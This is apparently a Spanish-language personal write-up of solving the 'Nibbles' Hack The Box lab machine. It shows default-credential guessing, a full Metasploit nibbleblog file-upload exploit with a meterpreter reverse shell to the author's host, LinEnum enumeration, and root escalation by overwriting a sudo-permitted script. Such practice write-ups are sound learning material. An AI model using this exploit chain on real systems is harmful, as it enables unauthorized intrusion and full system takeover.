Mi primera live box hoy es 31/05/18, publicada el 2/feb porque se publicó el fin de semana.
Por el nombre podemos asumir que se trata de nibbleblog
Sparta te dice que solo hay 2 puertos 80 y 22
si vamos al 80 y vemos el codigo fuente podemos ver que nos manda al folder de nibbleblog
y el default admin es admin.php
el usuario lo puedes adivinar es admin y el password igual… nibbles. ….
desde ahi puedes activar metasploit.
msf > use exploit/multi/http/nibbleblog_file_upload msf exploit(multi/http/nibbleblog_file_upload) > set rhost 10.10.10.75 msf exploit(multi/http/nibbleblog_file_upload) > show payloads msf exploit(multi/http/nibbleblog_file_upload) > set payload php/meterpreter_reverse_tcp msf exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9 msf exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/ msf exploit(multi/http/nibbleblog_file_upload) > run y ya tenemos una meterpreter de ahi a cd home/"user"/user.txt
Ahora subí Linenum
meterpreter > upload /usr/share/linenum/LinEnum.sh
meterpreter > shell
Process 1543 created.
Channel 2 created.
chmod +x LinEnum.sh
./LinEnum.sh
-----------------------------------
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh
-------
hay una forma de concatenar a un archivo (>>) y hay forma de borrar todo lo que habia y dejar solo tu informacion con echo “algo” (sin comillas) > archivo.
echo cat /root/root.txt > monitor.sh ./monitor.sh cat: /root/root.txt: Permission denied sudo ./monitor.sh
despues de un rato sale la flag y todos somos felices con mi primera maquina que me dio puntos 🙂
